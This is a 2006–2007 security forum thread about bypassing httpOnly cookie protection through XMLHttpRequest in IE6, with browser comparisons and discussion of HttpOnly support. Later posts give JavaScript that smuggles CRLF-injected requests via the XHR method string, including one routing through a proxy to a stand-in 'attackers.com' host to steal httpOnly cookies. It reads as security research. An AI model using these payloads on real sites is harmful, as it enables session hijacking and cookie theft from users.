I hope i didn't miss someone writing about it here already:

It seems that IE6 doesn't allow reading cookies from xhr.getResponseHeader('Set-Cookie') or xhr.getAllResponseHeaders(). At least, as long as the xhr method is set to "GET". If you change it into e.g. "GET x", you can read all cookies from Set-Cookie headers (including httpOnly cookies). Do you know any place I could read about other ways to bypass httpOnly with XHR?

( short testpage: http://lukasz.pilorz.net/testy/httponly/ - works for me in IE6 on Win2k/XP, doesn't work in IE7 on Vista)



Edited 2 time(s). Last edit at 12/31/2006 09:55AM by lpilorz.

Quote

If you change it into e.g. "GET x"

How'bout that! great find! I haven't seen this yet. Good example where I guess RegExes fail to work.

It seems I was wrong a bit (hey, I won't look for IE bugs in the middle of New Year's Eve party any more ;)):

Problem with reading cookies with XHR comes from caching, not built-in IE protection. Anyway, changing GET/POST method into something else ("GET x" or "WHATEVER YOU WISH") allows bypassing those caching problems.

Reading cookies from Set-Cookie header with XHR isn't very useful either - or am I wrong? Usually you get that header before you are able to use XHR.

By the way, Stefan Esser's httpOnly extension for Firefox seems to be immune for XHR cookie stealing.



Edited 1 time(s). Last edit at 12/31/2006 07:10PM by lpilorz.

lpilorz Wrote:
-------------------------------------------------------
> Reading cookies from Set-Cookie header with XHR
> isn't very useful either - or am I wrong? Usually
> you get that header before you are able to use
> XHR.
>
> By the way, Stefan Esser's httpOnly extension for
> Firefox seems to be immune for XHR cookie
> stealing.


Generally its not very useful, no, but if you have pages where you can somehoe force the websites to regenerate your session cookie or something (unlikely, but possible) and resend it to you, then it would be useful.

And I don't think its Stefan Esser's being immune, I think its just firefox being immune. I say this because it doesn't work for me and I don't have the extension installed since I haven't gotten around to upgrading to FF2.0 yet - yes, lazy me, but why can't they make the automatic update do it?

You're right about that cookie regeneration. I wonder how many web apps have such pages (not much, from what I know).

XHR on the test page uses "WHATEVER YOU WISH" HTTP method, which causes Firefox to throw error - that's the reason it doesn't show cookies. If you change it into GET, httpOnly (and all other) cookies should appear. httpOnly extension overwrites this cookies with some random value.

By the way, browsers give different results for xhr.GetResponseHeader("Set-Cookie"). IE6 returns only first Set-Cookie header, while Opera9 (which also allows "WHATEVER YOU WISH" HTTP method) returns combined values of all the Set-Cookie headers.

Testpage with GET method set correctly: http://lukasz.pilorz.net/testy/httponly/get.php

I've got a question: I'm modding my own version of FireFox, trouble is; I don't know exactly what that HttpOnly is doing and if you can run into trouble at site who require javascript to access cookies. I understand it blocks javascript from reading the cookies but then my question is: Do some websites still use javascript to read the cookies? I think, there must be a reason why FF did not inplement this from the beginning? If anyone can elaborate on this I'll be happy :)

Jungson. It's the developers of the website that set the HTTPOnly flag. If it's not set, then the cookie isn't HTTPOnly. So... if they've set the flag and do use document.cookie, then it's their fault that the site dies.

I'm guessing a reason Mozilla didn't implement it is because it's not a standard. I know PHP support the creation of HTTPOnly cookies, I suppose ASP does, does anyone know if perl can do it? (besides manually writing the header line)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Yes, Perl's CGI::Cookie has httponly attribute:
http://search.cpan.org/dist/CGI.pm/CGI/Cookie.pm

Jungsonn, I have seen a number of examples where applications have JavaScript that read from cookies. One reason for this is the "Hello soandso, welcome to our site." For some reason or another they have chosen to write that with a cookie (probably to reduce server load). That can lead to potential XSS if you can force the user to change their cookie to something and assuming the JavaScript doesn't do validation. But anyway, yes, there are a number of applications that do exactly this that may or may not use HTTPOnly cookies. Also, for those of you who aren't aware HTTPOnly isn't just non-standard it actually can break certain older browsers causing the page not to load (WebTV, and IE5.0 on Mac comes to mind). So you need to build a whitelist or just not worry about that subset of users.

- RSnake
Gotta love it. http://ha.ckers.org

Thanks, so it can be implemented in new versions of FF i guess? I can remember i've seen it, but that's was very early like in 1998 and so.

Well it doesn't break anything in Firefox, but for some reason they've had problems making it work. Stefan seemed to be able to do it but the developers at Firefox feel it will break things or it is difficult to know what context JavaScript should be allowed to see cookies or not.

- RSnake
Gotta love it. http://ha.ckers.org

Cool topic, lpilorz :)

On IE, We can use 0x09 in xhr method.
So HRS(HTTP Request smuggling) is possible with the following code

example1:
-----
var method = "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\n\r\nGET";
req.open( method, 'http://example.com/',false );
-----

example2:
-----
var method = "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\nX-Foo:";
req.open( method, 'http://example.com/',false );
-----

It works with Apache.
I think 'TRACE\x09...' and 'POST\x09...' will also work. ( Not tested yet )

This technique can be used to steal httpOnly cookies, in some cases.

--
Kanatoko
http://www.jumperz.net/

Under following conditions:
- The user is using a proxy ( tested on Apache and Squid )
- The proxy disables TRACE method
- The user is using IE
- www.example.com has a XSS hole
- www.example.com uses cookies with httpOnly flag
- www.example.com disables TRACE method

It is possible to steal cookies with:
(please replace 'htp://' to 'http://' )
-----
method = "GET\x09htp://www.attackers.com/\x09HTTP/1.1\r\nHost:www.attackers.com\r\nX-Foo:";
req.open( method, "http://www.example.com/", false );
req.send( null );
-----

#By the way, how can I avoid 'http://...' hyperlinking at here?

--
Kanatoko
http://www.jumperz.net/



Edited 1 time(s). Last edit at 01/06/2007 01:00PM by Kanatoko.

You could hyperlink one character like the colon h t t p [ u r l=h t t p : //ha.ckers.org]:[/url]whatever.com without all the spaces...

- RSnake
Gotta love it. http://ha.ckers.org

You could also bold the space character before it (bold because it's very short to type)

[ b ] [ / b ]http://test.com

test of it: http://test.com

-maluc



Edited 1 time(s). Last edit at 01/09/2007 03:36PM by maluc.